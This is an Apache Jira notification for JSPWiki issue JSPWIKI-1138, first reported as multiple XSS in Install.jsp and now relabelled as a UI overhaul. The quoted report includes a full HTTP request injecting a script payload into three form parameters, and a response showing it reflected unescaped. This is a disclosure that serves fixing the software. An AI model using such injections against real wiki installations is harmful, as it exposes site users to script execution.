You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@jspwiki.apache.org by "Juan Pablo Santos Rodríguez (Jira)" <ji...@apache.org> on 2021/09/23 09:23:00 UTC

[jira] [Updated] (JSPWIKI-1138) Install.jsp UI overhaul

     [ https://issues.apache.org/jira/browse/JSPWIKI-1138?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Juan Pablo Santos Rodríguez updated JSPWIKI-1138:
-------------------------------------------------
         Flags:   (was: Important)
    Issue Type: Task  (was: Bug)
        Labels:   (was: XSS)
      Security:     (was: Security Vulnerability Disclosure)
       Summary: Install.jsp UI overhaul  (was: Multi XSS via install.jsp)

Per previous comment, editing this issue to keep it as an UI overhaul.

> Install.jsp UI overhaul
> -----------------------
>
>                 Key: JSPWIKI-1138
>                 URL: https://issues.apache.org/jira/browse/JSPWIKI-1138
>             Project: JSPWiki
>          Issue Type: Task
>          Components: Core &amp; storage
>    Affects Versions: 2.11.0-M8
>         Environment: Windows new version
> Firefox version 84.0.1
>  
>            Reporter: Nguyen Dang Khai
>            Priority: Major
>         Attachments: xsswiki.PNG
>
>
> In function *install.jsp*  exist multi xss in parameter *jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir , jspwiki.workDir*. parameter not sanitize via method  *getContentEncoding*().
>  * Request :
> {code:java}
> // POST /wiki_jsp_war/Install.jsp HTTP/1.1
> Host: localhost:8080
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 248
> Origin: http://localhost:8080
> Connection: close
> Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
> Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE
> Upgrade-Insecure-Requests: 1jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
> {code}
>  * Response:
> {code:java}
> // HTTP/1.1 200 
> Pragma: no-cache
> Expires: -1
> Cache-Control: no-cache
> Content-Type: text/html;charset=UTF-8
> Content-Language: en-US
> Date: Wed, 23 Dec 2020 10:33:46 GMT
> Connection: close
> Content-Length: 4403<?xml version="1.0" encoding="UTF-8"?>
> ...
> </div><div class="formcontainer"><form action="Install.jsp" method="post">  <!-- Page directory -->
>   <h3>Basics</h3>    <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       What should your wiki be called?  Try to use a relative short name.</div>    <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div>
>   <h3>Security</h3>    <label class="control-label" >Administrator account</label>
>       <p>Enabled</p>
>       <div class="description">
>         This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div>
>     <h3>Advanced Settings</h3>    <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
>     </label>
>     <div class="help-block">
>       This is the place where all caches and other runtime stuff is stored.</div>
>     <p class="help-block">
>       After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p>
>     <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr />
>     <h3>Here is your new jspwiki-custom.properties</h3>
>        <pre>jspwiki.applicationName = '"><script>alert(1)</script>
> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
> jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
> jspwiki.pageProvider = VersioningFileProvider
> </pre>
>    <!-- We're done... -->
> </div>
> </div>
> </div>
> </body>
> </html>
> {code}



--
This message was sent by Atlassian Jira
(v8.3.4#803005)